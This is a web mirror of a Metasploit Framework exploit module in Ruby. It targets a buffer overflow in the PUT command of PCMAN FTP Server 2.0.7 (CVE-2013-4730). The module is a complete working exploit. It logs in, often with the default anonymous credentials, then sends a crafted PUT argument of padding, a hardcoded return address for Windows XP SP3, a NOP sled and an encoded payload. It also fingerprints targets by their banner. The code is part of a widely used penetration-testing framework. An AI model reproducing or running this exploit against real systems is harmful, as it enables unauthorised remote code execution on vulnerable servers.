Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/pcman_put.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',

16
        'Description' => %q{

17
          This module exploits a buffer overflow vulnerability found in the PUT command of the

18
          PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous

19
          credentials are enabled.

20
        },

21
        'Author' => [

22
          'Jay Turla', # Initial Discovery -- @shipcod3

23
          'Chris Higgins' # msf Module -- @ch1gg1ns

24
        ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2013-4730' ],

28
          [ 'EDB', '37731'],

29
          [ 'OSVDB', '94624']

30
        ],

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'process'

33
        },

34
        'Payload' => {

35
          'Space' => 1000,

36
          'BadChars' => "\x00\x0A\x0D",

37
        },

38
        'Platform' => 'win',

39
        'Targets' => [

40
          [

41
            'Windows XP SP3 English',

42
            {

43
              'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll

44
              'Offset' => 2007

45
            }

46
          ],

47
        ],

48
        'DisclosureDate' => '2015-08-07',

49
        'DefaultTarget' => 0,

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57
  end

58


59
  def post_auth?

60
    true

61
  end

62


63
  def check

64
    connect_login

65
    disconnect

66


67
    if /220 PCMan's FTP Server 2\.0/ === banner

68
      Exploit::CheckCode::Appears

69
    else

70
      Exploit::CheckCode::Safe

71
    end

72
  end

73


74
  def exploit

75
    connect_login

76


77
    print_status('Generating payload...')

78
    sploit = rand_text_alpha(target['Offset'])

79
    sploit << [target.ret].pack('V')

80
    sploit << make_nops(16)

81
    sploit << payload.encoded

82


83
    send_cmd(["PUT", sploit], false)

84
    disconnect

85
  end

86
end

87


88